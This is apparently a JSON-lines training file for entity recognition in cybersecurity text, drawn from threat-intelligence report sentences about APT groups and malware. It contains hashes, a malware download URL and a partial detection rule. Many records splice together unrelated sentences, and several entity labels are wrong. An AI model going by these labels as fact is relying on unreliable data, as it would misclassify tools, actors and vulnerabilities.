The attacks in that case took place in late September to early October 2016 and the attackers stored the MoonWind samples as RAR files , while in the November attacks the RATs were stored as executables .", "spans": {"THREAT_ACTOR: OilRig": [[20, 26]], "THREAT_ACTOR: threat group": [[27, 39]], "MALWARE: MoonWind samples": [[257, 273]], "MALWARE: RAR files": [[277, 286]], "MALWARE: RATs": [[323, 327]]}, "info": {"id": "cyberner_stix_train_002276", "source": "cyberner_stix_train"}} {"text": "The Federal Service for Technical and Export Control ( FTEC ) which is responsible for export control , intellectual property , and protecting confidential information .", "spans": {"ORGANIZATION: Federal Service for Technical and Export Control": [[4, 52]], "ORGANIZATION: FTEC": [[55, 59]]}, "info": {"id": "cyberner_stix_train_002277", "source": "cyberner_stix_train"}} {"text": "Suite 3000 was repeatedly found in each instance .", "spans": {}, "info": {"id": "cyberner_stix_train_002278", "source": "cyberner_stix_train"}} {"text": "The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": {"MALWARE: regsvr32.exe": [[4, 16]], "MALWARE: SCT file": [[121, 129]], "ORGANIZATION: Political entities": [[147, 165]], "THREAT_ACTOR: IndigoZebra": [[249, 260]], "THREAT_ACTOR: Sofacy": [[263, 269]], "MALWARE: Zebrocy": [[277, 284]], "MALWARE: malware": [[285, 292], [341, 348]], "MALWARE: Octopus": [[333, 340]]}, "info": {"id": "cyberner_stix_train_002279", "source": "cyberner_stix_train"}} {"text": "Analysis of the additional spyware modules is future work . 
In addition to using PlugX and Poison Ivy ( PIVY ) , both known to be used by the group , they also used a new Trojan called \" ChChes \" by the Japan Computer Emergency Response Team Coordination Center ( JPCERT ) . The routine that reads configuration from resources and decompresses the C2 communication library is then called by temporarily replacing the pointer to CComCriticalSection function with the pointer to that routine . Another detection opportunity identified by Mandiant was source IP addresses that access multiple user accounts in a short period of time recorded in the ns.log files or forwarded logs via syslog .", "spans": {"TOOL: PlugX": [[81, 86]], "TOOL: Poison Ivy": [[91, 101]], "TOOL: PIVY": [[104, 108]], "THREAT_ACTOR: group": [[142, 147]], "TOOL: ChChes": [[187, 193]], "ORGANIZATION: Japan Computer Emergency Response Team Coordination Center": [[203, 261]], "ORGANIZATION: JPCERT": [[264, 270]], "TOOL: C2": [[348, 350]], "TOOL: CComCriticalSection": [[428, 447]]}, "info": {"id": "cyberner_stix_train_002280", "source": "cyberner_stix_train"}} {"text": "As we saw in both 2016 and 2017 , disruptions to Necurs went hand-in-hand with quiet periods from TA505 .", "spans": {"MALWARE: Necurs": [[49, 55]], "THREAT_ACTOR: TA505": [[98, 103]]}, "info": {"id": "cyberner_stix_train_002281", "source": "cyberner_stix_train"}} {"text": "Code structure Obviously , this code is not obfuscated when compared with the previous version it becomes clear that this is the same code base . Chafer , uses Backdoor.Remexi . These documents were also emailed to organizations in Japan and Taiwan . 
During C0018 , the threat actors opened a variety of ports , including ports 28035 , 32467 , 41578 , and 46892 , to establish RDP connections.[9 ]", "spans": {"TOOL: Backdoor.Remexi": [[160, 175]], "THREAT_ACTOR: threat actors": [[270, 283]]}, "info": {"id": "cyberner_stix_train_002282", "source": "cyberner_stix_train"}} {"text": "The figure below shows a fragment of encrypted JAR stored in .rodata section of a shared object shipped with the APK as well as the XOR key used for decryption . As a result , it is already flagged as Bahamut by antivirus engines . The architecture of this dropper is different from the others : it starts extracting the main driver from itself . A new report from the Malwarebytes Threat Intelligence team shows 1,900 total ransomware attacks within just four countries — the US , Germany , France , and the UK — in one year .", "spans": {"ORGANIZATION: Malwarebytes Threat Intelligence team": [[369, 406]]}, "info": {"id": "cyberner_stix_train_002283", "source": "cyberner_stix_train"}} {"text": "Recommendations Popular mobile platforms like Android are common targets for organized or commercialized monitoring operations . During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort . 
The unflattening algorithm requires mapping information between block comparison variable and the actual block number ( mblock_t : :s erial ) In 2009 , the Winnti group shifted to targeting gaming companies in South Korea using a self - named data- and file - stealing malware .", "spans": {"SYSTEM: Android": [[46, 53]], "THREAT_ACTOR: Operation Cleaver": [[239, 256]], "TOOL: mblock_t : :s erial": [[450, 469]], "THREAT_ACTOR: Winnti group": [[486, 498]], "ORGANIZATION: gaming companies": [[520, 536]], "MALWARE: self - named data- and file - stealing malware": [[560, 606]]}, "info": {"id": "cyberner_stix_train_002284", "source": "cyberner_stix_train"}} {"text": "Some of these might have been used on old campaigns or were already prepared for new campaigns . We have observed that in cases where APT10 has infiltrated a target via an MSP , it continues to use the MSPs credentials . The attack took place between June and November 2018 and according to our telemetry , it affected a large number of users . – Consistent with KillNet activity in 2022 , the majority of claimed attacks in 2023 targeted entities in the U.S. 
and Europe .", "spans": {"THREAT_ACTOR: APT10": [[134, 139]], "TOOL: MSP": [[172, 175]], "ORGANIZATION: MSPs": [[202, 206]], "THREAT_ACTOR: KillNet activity": [[363, 379]]}, "info": {"id": "cyberner_stix_train_002285", "source": "cyberner_stix_train"}} {"text": "This is custom malware , which despite large file size ( 1,1 MB ) , provides limited functionality .", "spans": {}, "info": {"id": "cyberner_stix_train_002286", "source": "cyberner_stix_train"}} {"text": "The majority of the overall samples came from the following four sites :", "spans": {}, "info": {"id": "cyberner_stix_train_002287", "source": "cyberner_stix_train"}} {"text": "These targets have included organizations such as ministries of foreign affairs , embassies , senates , parliaments , ministries of defense , defense contractors , and think tanks .", "spans": {}, "info": {"id": "cyberner_stix_train_002288", "source": "cyberner_stix_train"}} {"text": "2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a", "spans": {"FILEPATH: 2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a": [[0, 64]]}, "info": {"id": "cyberner_stix_train_002289", "source": "cyberner_stix_train"}} {"text": "They also changed the final Windows payload significantly from the well-known Fallchill malware used in the previous attack .", "spans": {"SYSTEM: Windows": [[28, 35]], "MALWARE: Fallchill": [[78, 87]]}, "info": {"id": "cyberner_stix_train_002290", "source": "cyberner_stix_train"}} {"text": "] com ’ was registered via GoDaddy , and uses privacy protection service . Just last week Lazarus were found stealing millions from ATMs across Asia and Africa . 
This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": {"ORGANIZATION: GoDaddy": [[27, 34]], "THREAT_ACTOR: Lazarus": [[90, 97]], "TOOL: emails": [[228, 234]], "FILEPATH: Microsoft Word attachment": [[242, 267]], "VULNERABILITY: CVE-2017-0199": [[300, 313]], "MALWARE: ZeroT Trojan": [[328, 340]], "MALWARE: PlugX Remote Access Trojan": [[372, 398]], "MALWARE: RAT": [[401, 404]]}, "info": {"id": "cyberner_stix_train_002291", "source": "cyberner_stix_train"}} {"text": "Table 2 below lists some of these apps with their respective metadata . To witnesses , the spy appears to be running a program showing videos (e.g VLC) , presenting slides (Prezi) , playing a computer game (Breakout2 , 2048) or even running a fake virus scanner . APT17 , also known as DeputyDog , is a China-based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. 
government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": {"THREAT_ACTOR: spy": [[91, 94]], "TOOL: presenting slides": [[154, 171]], "TOOL: fake virus scanner": [[243, 261]], "THREAT_ACTOR: APT17": [[264, 269]], "THREAT_ACTOR: DeputyDog": [[286, 295]], "ORGANIZATION: FireEye Intelligence": [[333, 353]], "ORGANIZATION: government entities": [[410, 429]], "ORGANIZATION: defense industry": [[436, 452]], "ORGANIZATION: law firms": [[455, 464]], "ORGANIZATION: information technology companies": [[467, 499]], "ORGANIZATION: mining companies": [[502, 518]], "ORGANIZATION: non-government organizations": [[525, 553]]}, "info": {"id": "cyberner_stix_train_002292", "source": "cyberner_stix_train"}} {"text": "Report_URL : https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf", "spans": {}, "info": {"id": "cyberner_stix_train_002293", "source": "cyberner_stix_train"}} {"text": "Furthermore , we found that in just the first two weeks of 2017 , there have been more than 120 such spyware variants already built using the same SpyNote Trojan builder as SpyNote RAT and roaming in the wild . The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . The vulnerability was used to retrieve and execute Cobalt Strike from a remote server they controlled .", "spans": {"MALWARE: SpyNote": [[147, 154]], "MALWARE: SpyNote RAT": [[173, 184]], "MALWARE: Silence.Downloader": [[228, 246]], "MALWARE: Cobalt Strike": [[367, 380]]}, "info": {"id": "cyberner_stix_train_002294", "source": "cyberner_stix_train"}} {"text": "Moreover , they used the same exploit kit Niteris as that in the Corkow case . 
In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly ( which Dragos associates with DYMALLOY ) .", "spans": {"VULNERABILITY: kit Niteris": [[38, 49]], "TOOL: Corkow": [[65, 71]], "ORGANIZATION: DHS": [[99, 102]], "ORGANIZATION: Symantec": [[189, 197]], "THREAT_ACTOR: Dragonfly": [[204, 213]], "ORGANIZATION: Dragos": [[222, 228]], "MALWARE: DYMALLOY": [[245, 253]]}, "info": {"id": "cyberner_stix_train_002295", "source": "cyberner_stix_train"}} {"text": "The strings inside the binary are encrypted using 3DES and XOR and reversed .", "spans": {}, "info": {"id": "cyberner_stix_train_002296", "source": "cyberner_stix_train"}} {"text": "When users try to close the ads , the new functionality causes already downloaded apps to run in a virtual machine . Furthermore , like many other identified Lazarus Group families , these tools showcase the group 's creative solutions , such as the PapaAlfa , which makes it difficult to immediately identify potentially malicious activity on a compromised network . Notestuk ( Backdoor.Notestuk ) ( aka TURNEDUP ) : Malware that can be used to open a backdoor and gather information from a compromised computer . Healthcare has seen increasing email attacks from threat actors for a number of reasons .", "spans": {"THREAT_ACTOR: Lazarus Group": [[158, 171]], "THREAT_ACTOR: group": [[208, 213]], "TOOL: PapaAlfa": [[250, 258]], "MALWARE: Notestuk": [[368, 376]], "MALWARE: Backdoor.Notestuk": [[379, 396]], "MALWARE: TURNEDUP": [[405, 413]], "ORGANIZATION: Healthcare": [[515, 525]], "THREAT_ACTOR: threat actors": [[565, 578]]}, "info": {"id": "cyberner_stix_train_002297", "source": "cyberner_stix_train"}} {"text": "The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes . 
Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks .", "spans": {"THREAT_ACTOR: threat actor": [[53, 65]], "TOOL: mimikatz": [[81, 89]], "THREAT_ACTOR: Barium": [[115, 121]], "ORGANIZATION: employees": [[244, 253], [386, 395]], "ORGANIZATION: social media": [[297, 309]]}, "info": {"id": "cyberner_stix_train_002298", "source": "cyberner_stix_train"}} {"text": "Most of the network traffic we ’ ve observed is HTTP . Because APT38 is backed by ( and acts on behalf of ) the North Korean regime , we opted to categorize the group as an \" APT \" instead of a \" FIN \" . Control flow flattening is an obfuscation method where programs do not cleanly flow from beginning to end . None LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": {"THREAT_ACTOR: APT38": [[63, 68]], "THREAT_ACTOR: group": [[161, 166]], "THREAT_ACTOR: APT": [[175, 178]], "TOOL: LIGHTWORK": [[317, 326]]}, "info": {"id": "cyberner_stix_train_002299", "source": "cyberner_stix_train"}} {"text": "] 87:28833 61 [ . The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system – a move that showcases their continued evolution toward multi-platform attacks . The PowerShell script will first create an instance of the .Net Webclient class and then enumerate the available methods using the GetMethods() call ( highlighted in the image in red ) . 
Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n’t happening any time soon .", "spans": {"THREAT_ACTOR: Sofacy group": [[22, 34]], "TOOL: Komplex Trojan": [[47, 61]], "TOOL: PowerShell": [[211, 221]], "FILEPATH: .Net": [[266, 270]], "TOOL: GetMethods()": [[338, 350]], "MALWARE: Royal": [[416, 421]], "MALWARE: BlackSuit": [[426, 435]]}, "info": {"id": "cyberner_stix_train_002300", "source": "cyberner_stix_train"}} {"text": "The group had obtained the certificates through pre-attack operations before commencing targeted attacks against a number of government and commercial organizations spread across multiple continents over a two-year period .", "spans": {}, "info": {"id": "cyberner_stix_train_002301", "source": "cyberner_stix_train"}} {"text": "Other samples were also noticed , posing as a client of a ticket-finding service or as an app store for Android . Distinct changes to Azazel by the Winnti developers include the addition of a function named ‘Decrypt2’ , which is used to decode an embedded configuration similar to the core implant . This evolution is illustrated across 4 campaigns : one in 2014 , one in 2016 and finally two in 2017 .", "spans": {"SYSTEM: Android": [[104, 111]], "TOOL: Azazel": [[134, 140]], "THREAT_ACTOR: Winnti developers": [[148, 165]]}, "info": {"id": "cyberner_stix_train_002303", "source": "cyberner_stix_train"}} {"text": "It appears that they introduced Shifu after high-profile law enforcement actions impacted Dridex distribution .", "spans": {"MALWARE: Shifu": [[32, 37]], "MALWARE: Dridex": [[90, 96]]}, "info": {"id": "cyberner_stix_train_002304", "source": "cyberner_stix_train"}} {"text": "These additional samples behaved similarly to the initial files ;", "spans": {}, "info": {"id": "cyberner_stix_train_002305", "source": "cyberner_stix_train"}} {"text": "Next , the dropper checks its own parent process for indications that it is running in a sandbox setup . 
We have also seen Magic Hound using DropIt as a binder , specifically dropping a legitimate decoy executable along with the malicious executable onto the target host . Winnti : T1032 Standard Cryptographic Protocol ( RC4 , RC5 ) . title : MicroSCADA SCILC Command Execution description : Identification of Events or Host Commands that are related to the MicroSCADA SCILC programming language and specifically command execution author : Mandiant date : 2023/02/27 logsource : product : windows service : security detection : selection : NewProcessName|endswith : - \\scilc.exe CommandLine|contains : -", "spans": {"TOOL: DropIt": [[141, 147]], "THREAT_ACTOR: Winnti": [[273, 279]], "ORGANIZATION: Mandiant": [[541, 549]]}, "info": {"id": "cyberner_stix_train_002306", "source": "cyberner_stix_train"}} {"text": "When specific versions are discovered that may cause issues for the RAT , it promptly exits .", "spans": {"TOOL: RAT": [[68, 71]]}, "info": {"id": "cyberner_stix_train_002307", "source": "cyberner_stix_train"}} {"text": "The loader Trojan uses this batch file to run the embedded DLL payload .", "spans": {"VULNERABILITY: Trojan": [[11, 17]], "TOOL: DLL": [[59, 62]]}, "info": {"id": "cyberner_stix_train_002308", "source": "cyberner_stix_train"}} {"text": "Currently , this only affects Russian banks , but the technology behind Svpeng could easily be used to target other banking applications . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies . The primary attack vectors are watering-hole , spear phishing , and other web-based attacks . 
KillMilk continues to be a central coordinator for the KillNet Collective , despite claims of leaving the group in mid-2022 .", "spans": {"MALWARE: Svpeng": [[72, 78]], "TOOL: Epic Turla": [[160, 170]], "ORGANIZATION: embassies": [[249, 258]], "THREAT_ACTOR: KillMilk": [[355, 363]]}, "info": {"id": "cyberner_stix_train_002309", "source": "cyberner_stix_train"}} {"text": "After reestablishing access , the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used .", "spans": {"TOOL: gsecudmp": [[69, 77]], "TOOL: WCE": [[82, 85]], "THREAT_ACTOR: TG-3390": [[131, 138]]}, "info": {"id": "cyberner_stix_train_002310", "source": "cyberner_stix_train"}} {"text": "PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts . The NetTraveler trojan has been known to be used in targeted cyber espionage attacks for more than a decade by nation state threat actors and continues to be used to target its victims and exfiltrate data .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "VULNERABILITY: zero-day exploits": [[43, 60]], "MALWARE: NetTraveler trojan": [[159, 177]]}, "info": {"id": "cyberner_stix_train_002311", "source": "cyberner_stix_train"}} {"text": "This intelligence has been critical to protecting and informing our clients , exposing this threat , and strengthening our confidence in attributing APT28 to the Russian Government .", "spans": {"THREAT_ACTOR: APT28": [[149, 154]]}, "info": {"id": "cyberner_stix_train_002312", "source": "cyberner_stix_train"}} {"text": "The ActionScript will read each byte of the C2 response and get the hexadecimal value .", "spans": {"TOOL: ActionScript": [[4, 16]], "TOOL: C2": [[44, 46]]}, "info": {"id": "cyberner_stix_train_002313", "source": "cyberner_stix_train"}} {"text": "We found no similarities to commercial spyware products or to other known spyware 
variants , which suggests BusyGasper is self-developed and used by a single threat actor . Because of this , additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL . Activity ceased until the attackers returned on March 5 and were observed using Quasar RAT to download a second custom AutoIt FTP Exfiltration tool known as FastUploader from http://192.119.15.36:880/ftp.exe . Techniques include reading SAM and LSA secrets from registries , dumping NTLM hashes , plaintext credentials , and Kerberos keys , as well as dumping the NTDS.dit Active Directory database .", "spans": {"MALWARE: BusyGasper": [[108, 118]], "TOOL: HIDDEN COBRA malware": [[202, 222]], "TOOL: FALLCHILL": [[266, 275]], "MALWARE: Quasar RAT": [[358, 368]], "MALWARE: AutoIt FTP": [[397, 407]], "MALWARE: FastUploader": [[435, 447]], "URL: http://192.119.15.36:880/ftp.exe": [[453, 485]]}, "info": {"id": "cyberner_stix_train_002314", "source": "cyberner_stix_train"}} {"text": "This code modification marks an unusual departure from the typical AZZY backdoors , with its C&C communication functions moved to an external DLL file .", "spans": {"MALWARE: AZZY backdoors": [[67, 81]], "TOOL: C&C": [[93, 96]], "TOOL: DLL": [[142, 145]]}, "info": {"id": "cyberner_stix_train_002315", "source": "cyberner_stix_train"}} {"text": "A TrickMo version from January 2020 contained code that checks if the app is running on a rooted device or an emulator to prevent analysis . According to Wikipedia , the CSS was formed in 1972 to integrate the NSA and the Service Cryptologic Elements ( SCE ) of the U.S armed forces . 
In addition to Helminth , the ISMDoor implant is likely used by the Iran-based adversary to attack targets particularly those in the Middle East region .", "spans": {"MALWARE: TrickMo": [[2, 9]], "MALWARE: Helminth": [[300, 308]], "MALWARE: ISMDoor": [[315, 322]]}, "info": {"id": "cyberner_stix_train_002316", "source": "cyberner_stix_train"}} {"text": "This investigation shows multiple similarities to previous attacks attributed to a group called MoleRATs ( aka The Gaza Cybergang ) , an Arabic-speaking , politically motivated group that has operated in the Middle East since 2012 .", "spans": {"THREAT_ACTOR: MoleRATs": [[96, 104]], "THREAT_ACTOR: Gaza Cybergang": [[115, 129]]}, "info": {"id": "cyberner_stix_train_002317", "source": "cyberner_stix_train"}} {"text": "The malware then builds two DLLs in memory – they are 32 and 64-bit DLLs that have identical functionality . 360 and Tuisec already identified some Gorgon Group members .", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: DLLs": [[28, 32]], "ORGANIZATION: 360": [[109, 112]], "ORGANIZATION: Tuisec": [[117, 123]], "THREAT_ACTOR: Gorgon Group": [[148, 160]], "ORGANIZATION: members": [[161, 168]]}, "info": {"id": "cyberner_stix_train_002318", "source": "cyberner_stix_train"}} {"text": "The “ idXXXXX.top ” pattern immediately stands out and may suggest a pattern in the static configuration for the initial domains used by the DGA for Nymaim since the previous two started with “ ejX.com .", "spans": {"MALWARE: Nymaim": [[149, 155]], "DOMAIN: ejX.com": [[194, 201]]}, "info": {"id": "cyberner_stix_train_002319", "source": "cyberner_stix_train"}} {"text": "cfd77ddc5c1ebb8498c899a68ea75d2616c1c92a0e618113d7c9e5fcc650094b Flash Player com.gzhlubw.pmevdiexmn 3f2ed928789c200e21fd0c2095619a346f75d84f76f1e54a8b3153385850ea63 Target list The actual observed list of mobile apps targeted by Cerberus contains a total of 30 unique applications . 
The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data Exfiltration and to provide remote access to infected machines .", "spans": {"SYSTEM: Flash Player": [[65, 77]], "MALWARE: Cerberus": [[230, 238]], "THREAT_ACTOR: SectorJ04": [[288, 297]], "MALWARE: Carbanak": [[426, 434]], "MALWARE: Carberp": [[477, 484]]}, "info": {"id": "cyberner_stix_train_002320", "source": "cyberner_stix_train"}} {"text": "Kaspersky Internet Security for Android detects all three of Triada ’ s modules , so it can save your money from cybercriminals that are behind Triada . We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East .", "spans": {"SYSTEM: Kaspersky Internet Security": [[0, 27]], "SYSTEM: Android": [[32, 39]], "MALWARE: Triada": [[61, 67], [144, 150]], "THREAT_ACTOR: groups": [[168, 174]], "VULNERABILITY: CVE-2018-0798": [[188, 201]], "THREAT_ACTOR: APT34": [[413, 418]], "VULNERABILITY: CVE-2017-0199": [[509, 522]], "VULNERABILITY: CVE-2017-11882": [[527, 541]]}, "info": {"id": "cyberner_stix_train_002321", "source": "cyberner_stix_train"}} {"text": "FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors . 
Unit 42 does not have detailed targeting information for all known Bookworm samples , but we are aware of attempted attacks on at least two branches of government in Thailand .", "spans": {"TOOL: FALLCHILL": [[0, 9]], "TOOL: HIDDEN COBRA malware": [[64, 84]], "THREAT_ACTOR: HIDDEN COBRA actors": [[165, 184]], "ORGANIZATION: Unit 42": [[187, 194]], "MALWARE: Bookworm samples": [[254, 270]], "ORGANIZATION: government": [[339, 349]]}, "info": {"id": "cyberner_stix_train_002322", "source": "cyberner_stix_train"}} {"text": "The red fields are used as the shortcode and keyword for SMS billing . Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords . In our analysed sample the “ Loveusd.sys ” driver is installed with the name “ USBHPMS ” . In some cases , the threat actors may have been using compromised organizations to gain access to other victims in supplychaintype attacks .", "spans": {"FILEPATH: Loveusd.sys": [[248, 259]], "FILEPATH: USBHPMS": [[298, 305]], "THREAT_ACTOR: threat actors": [[330, 343]]}, "info": {"id": "cyberner_stix_train_002323", "source": "cyberner_stix_train"}} {"text": "CTU researchers have not observed TG-4127 use this technique ( using Bitly short links ) to target the U.S. Republican party or the other U.S. presidential candidates whose campaigns were active between mid-March and mid-May : Donald Trump , Bernie Sanders , Ted Cruz , Marco Rubio , and John Kasich .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-4127": [[34, 41]], "TOOL: Bitly": [[69, 74]]}, "info": {"id": "cyberner_stix_train_002324", "source": "cyberner_stix_train"}} {"text": "The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . 
Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer .", "spans": {"MALWARE: archive": [[14, 21]], "VULNERABILITY: vulnerability": [[82, 95]], "THREAT_ACTOR: threat groups": [[223, 236]], "VULNERABILITY: CVE-2018-0798": [[255, 268]], "MALWARE: RTF weaponizer": [[278, 292]]}, "info": {"id": "cyberner_stix_train_002325", "source": "cyberner_stix_train"}} {"text": "It was executed from the Telegram messenger download folder :", "spans": {"TOOL: Telegram": [[25, 33]]}, "info": {"id": "cyberner_stix_train_002326", "source": "cyberner_stix_train"}} {"text": "By adding the previously calculated offset , it can get the address of the mmap function in the target process memory . The main reason for the increase in Potao detections in 2014 and 2015 were infections through USB drives . APT17 : de56eb5046e518e266e67585afa34612 . These new infection vectors rely on Java and IE vulnerabilities to infect the victim ’s PC .", "spans": {"TOOL: Potao": [[156, 161]], "THREAT_ACTOR: APT17": [[227, 232]], "FILEPATH: de56eb5046e518e266e67585afa34612": [[235, 267]], "VULNERABILITY: Java and IE vulnerabilities": [[306, 333]], "ORGANIZATION: the victim ’s PC": [[344, 360]]}, "info": {"id": "cyberner_stix_train_002327", "source": "cyberner_stix_train"}} {"text": "In this blog , we ’ ll detail the innovative ways in which this ransomware surfaces its ransom note using Android features we haven ’ t seen leveraged by malware before , as well as incorporating an open-source machine learning module designed for context-aware cropping of its ransom note . Unit 42 researchers have been tracking an active campaign . . 
The IP range for “ PIG GOD ” is 43[.]255[.]188.0/22 , which appears to be hosted in Hong Kong as seen in the information we found : The domain 66[.]to leads to another website that shows Hack520 ’s pet pig .", "spans": {"SYSTEM: Android": [[106, 113]], "ORGANIZATION: Unit 42": [[292, 299]]}, "info": {"id": "cyberner_stix_train_002328", "source": "cyberner_stix_train"}} {"text": "This shows how the attackers use this backdoor in a surgical way to exclusively attack specific targets .", "spans": {}, "info": {"id": "cyberner_stix_train_002329", "source": "cyberner_stix_train"}} {"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[40, 57]], "MALWARE: Microsoft Office Word document": [[86, 116]], "VULNERABILITY: CVE-2012-0158": [[159, 172]], "ORGANIZATION: Symantec": [[177, 185]], "THREAT_ACTOR: Leafminer": [[212, 221]], "VULNERABILITY: Heartbleed vulnerability": [[238, 262]], "VULNERABILITY: CVE-2014-0160": [[265, 278]]}, "info": {"id": "cyberner_stix_train_002330", "source": "cyberner_stix_train"}} {"text": "Both of these infection vectors are highly indiscriminate and untargeted when compared to spearphishing , the usual infection vector of choice for the Dukes .", "spans": {"THREAT_ACTOR: Dukes": [[151, 156]]}, "info": {"id": "cyberner_stix_train_002331", "source": "cyberner_stix_train"}} {"text": "VERSIONING Bread has also leveraged an abuse tactic unique to app stores : versioning . Barium Defendants install the malicious \" Win32/Barlaiy \" malware and the malicious \" Win32/PlugX.L \" malware on victim computers using the means described above . 
We used the ZxShell package for version 3.10 ( SHA256 : 1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4 ).The convenient thing about this is that the CNC panel worked with any version , 3.10 and above . Lowcode automation of processes can make the required actions fast , reliable , and repeatable .", "spans": {"MALWARE: Bread": [[11, 16]], "THREAT_ACTOR: Barium": [[88, 94]], "TOOL: Win32/Barlaiy": [[130, 143]], "TOOL: Win32/PlugX.L": [[174, 187]], "MALWARE: ZxShell": [[264, 271]], "FILEPATH: 1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4": [[308, 372]], "TOOL: CNC panel": [[419, 428]]}, "info": {"id": "cyberner_stix_train_002332", "source": "cyberner_stix_train"}} {"text": "Using this artifact , we were able to pivot and discover another attack campaign using the DealersChoice exploit kit with similar victimology to what we saw in February .", "spans": {"TOOL: DealersChoice": [[91, 104]]}, "info": {"id": "cyberner_stix_train_002333", "source": "cyberner_stix_train"}} {"text": "It considers the age of the file , its global prevalence , and the presence and validity of a digital signature along with the method of service creation .", "spans": {}, "info": {"id": "cyberner_stix_train_002334", "source": "cyberner_stix_train"}} {"text": "It was late 2018 when Riltok climbed onto the international stage . Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . 
The decoy document of the 2 last campaigns suggests that the targets are public organisations .", "spans": {"MALWARE: Riltok": [[22, 28]], "THREAT_ACTOR: Zebrocy": [[68, 75]], "VULNERABILITY: 0day exploits": [[200, 213]]}, "info": {"id": "cyberner_stix_train_002335", "source": "cyberner_stix_train"}} {"text": "This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . Last week we discussed Numbered Panda , a group that is also based out of China and is fairly well known to the security community , though by many names .", "spans": {"MALWARE: .lnk file": [[53, 62]], "THREAT_ACTOR: Numbered Panda": [[217, 231]], "ORGANIZATION: security community": [[306, 324]]}, "info": {"id": "cyberner_stix_train_002336", "source": "cyberner_stix_train"}} {"text": "Never click on unknown links received through ads , SMS messages , emails , or the like . Furthermore , from 2015 to 2019 , we detected new versions of known malware families attributed to the Ke3chang group – BS2005 backdoors from operation Ke3chang and the RoyalDNS malware , reported by NCC Group in 2018 . 
Group7 : APT15 , Mirage , Vixen Panda , GREF , Playful Dragon , RoyalAPT .", "spans": {"THREAT_ACTOR: Ke3chang": [[193, 201]], "TOOL: BS2005 backdoors": [[210, 226]], "TOOL: RoyalDNS malware": [[259, 275]], "ORGANIZATION: NCC": [[290, 293]], "THREAT_ACTOR: Group7": [[310, 316]], "THREAT_ACTOR: APT15": [[319, 324]], "THREAT_ACTOR: Mirage": [[327, 333]], "THREAT_ACTOR: Vixen Panda": [[336, 347]], "THREAT_ACTOR: GREF": [[350, 354]], "THREAT_ACTOR: Playful Dragon": [[357, 371]], "THREAT_ACTOR: RoyalAPT": [[374, 382]]}, "info": {"id": "cyberner_stix_train_002337", "source": "cyberner_stix_train"}} {"text": "The new one with the title \" Coralco Archimedes , '' and an older version with the title \" Wolf Intelligence : '' New panel Old panel The new panel name contains \" Coralco '' in its name . In February 2015 , Kaspersky Lab 's Global Research and Analysis Team ( GReAT ) released its research into the Carbanak campaign targeting financial institutions . Some samples alternatively use an FGKD.jsp or an FPK.jsp file . 
